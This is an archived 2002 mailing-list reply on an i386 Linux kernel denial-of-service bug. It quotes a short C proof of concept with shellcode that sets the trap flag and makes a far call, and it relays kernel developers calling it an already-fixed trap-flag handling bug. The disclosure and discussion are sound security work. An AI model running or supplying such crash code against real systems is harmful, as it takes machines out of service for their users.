RE: i386 Linux kernel DoS

From: Leif Sawyer (lsawyerat_private)
Date: Tue Nov 12 2002 - 15:58:36 PST

    Christophe Devine writes:
    > /* USE AT YOUR OWN RISK ! */
    > 
    > int main( void )
    > {
    >     char dos[] = "\x9C"                           /* pushfd       */
    >                  "\x58"                           /* pop eax      */
    >                  "\x0D\x00\x01\x00\x00"           /* or eax,100h  */
    >                  "\x50"                           /* push eax     */
    >                  "\x9D"                           /* popfd        */
    >                  "\x9A\x00\x00\x00\x00\x07\x00";  /* call 07h:00h */
    > 
    >     void (* f)( void );
    > 
    >     f = (void *) dos; (* f)();
    > 
    >     return 1;
    > }
    
    You didn't specify which kernel this was being used against, but
    this is what the response from LKML is:
    
    > -----Original Message-----
    > From: Alan Cox
    > Sent: Tuesday, November 12, 2002 3:10 PM
    > To: Christoph Hellwig
    > Cc: Leif Sawyer; Linux Kernel Mailing List
    > Subject: Re: FW: i386 Linux kernel DoS
    > 
    > 
    > On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
    > > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
    > > > This was posted on bugtraq today...
    > > 
    > > A real segfaulting program?  wow :)
    > 
    > Looks like the TF handling bug which was fixed a while ago
     
    



    This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 14:12:17 PST